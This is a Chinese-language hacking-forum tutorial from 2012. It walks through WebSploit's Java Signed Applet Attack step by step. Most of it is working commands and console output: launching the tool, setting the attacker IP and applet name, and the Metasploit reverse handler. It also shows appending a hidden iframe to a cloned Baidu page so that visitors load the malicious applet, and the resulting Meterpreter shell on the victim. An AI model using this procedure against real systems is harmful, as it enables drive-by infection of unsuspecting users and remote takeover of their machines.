切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
177 WebSploit 1 Java Applet 攻击[复制链接]
发表于 2012-10-2 10:57:51 | 显示全部楼层 |!read_mode!
WebSploit 网络综合应用工具 视频:http://www.3g-sec.com/shiping/177-2.zip
  1. root@Dis9Team:/tmp# axel -n 10 http://iweb.dl.sourceforge.net/project/websploit/WebSploit%20Toolkit%20V.1.9/WebSploit%20Toolkit%20V.1.9.tar.gz
  2. root@Dis9Team:/tmp# tar xf WebSploit\ Toolkit\ V.1.9.tar.gz
  3. root@Dis9Team:/tmp# cp -rf WebSploit\ Toolkit\ V.1.9 /pen/WebSploit
  4. root@Dis9Team:/tmp# cd /pen/WebSploit/
  5. root@Dis9Team:/pen/WebSploit# ./websploit
复制代码


JAVA浏览器攻击

  1.    ID & Name            Description
  2.      ------------             --------------
  3.      [1]WebSite Attack Vector  Scanners,Crawlers For WebSite
  4.      [2]Network Attack Vector  Network Attack Tools
  5.      [3]Automatic Exploiter         Automatic Exploit Vulnerability
  6.      [4]Format Infector        Inject Custom Payload Into File Formats
  7.      [5]Web Tools              WebSite Tools

  8.      [88]Update                Update WebSploit Toolkit
  9.      [99]Exit             Exit


  10. wsf > 2
复制代码
选择 2 Network Attack Vector
  1. ID & Name                         Description
  2.         ------------                        --------------
  3.         [1]MITM                                 Man In The Middle Attack
  4.         [2]MLITM                         Man Left In The Middle,XSS Phishing Attack
  5.         [3]Java Applet Attack                 Java Signed Applet Attack
  6.         [4]MFOD                                 Middle Finger Of Doom Attack
  7.         [5]ARP DOS                         ARP Cache Denial Of Service Attack With Random MAC
  8.         [6]Web Killer                         Using From The TCPKill For Down Your WebSite On Network

  9.         [99]Main Menu                         Go To Main Menu
复制代码
选择 3 java攻击


  1. [*]Java Signed Applet Attack
  2. [*]Interface Name (ex : eth0,Wlan0 ...)
  3. wsf:Java Applet > Enter Interface Name : eth1
  4. wsf:Java Applet > Enter Your IP Address : 5.5.5.2
  5. [*]Enter Java Signed Windows Information (Display In Victim Browser)
  6. wsf:Java Applet > Enter Main Applet's Class Name : door
  7. wsf:Java Applet > Enter Name Of Publisher : door
  8. [*]Setting Up , Wait A Few Seconds ...
  9. [*]Your Index Has Been Changed...
  10. [*]You Can Change The Index From Here => /var/www/index.html
  11. [*]But Don't Forget Your IP Address, Write It In <iframe> Tag
  12. [*]Engine Has Been Started ... Wait For Victim Click ...
  13. [*] Please wait while we load the module tree...
复制代码

输入网卡 本地IP JAVA木马名字

载入METASPLOIT

  1. APPLETNAME => door
  2. CERTCN => door
  3. URIPATH => index
  4. [*] Exploit running as background job.

  5. [*] Started reverse handler on 10.0.3.15:4444
  6. msf  exploit(java_signed_applet) >
  7. msf  exploit(java_signed_applet) >
  8. [*] Using URL: http://0.0.0.0:8080/index
  9. [*]  Local IP: http://10.0.3.15:8080/index
  10. [*] Server started.
  11. [*] 5.5.5.3          java_signed_applet - Handling request
复制代码
  1. root@Dis9Team:~# cd /var/www/
  2. root@Dis9Team:/var/www# nano index.html
复制代码
index.html 编辑他…

  1. <iframe src=http://5.5.5.2:8080/index></iframe>
复制代码
是重点 别删除 例如我的

  1. root@Dis9Team:/var/www# wget -k www.baidu.com -O index.html
  2. root@Dis9Team:/var/www# echo "<iframe src=http://5.5.5.2:8080/index></iframe>" >> index.html
复制代码
必须两个 >> 如果是一个>就是覆盖


运行获得SHELL


  1. msf  exploit(java_signed_applet) > [*] 5.5.5.3          java_signed_applet - Handling request
  2. [*] 5.5.5.3          java_signed_applet - Sending door.jar. Waiting for user to click 'accept'...
  3. [*] Sending stage (752128 bytes) to 5.5.5.3
  4. [*] Meterpreter session 1 opened (5.5.5.2:1111 -> 5.5.5.3:1405) at 2012-07-11 13:16:49 -0700

  5. msf  exploit(java_signed_applet) > sessions -i 1
  6. [*] Starting interaction with 1...

  7. meterpreter >
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-6 08:49

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部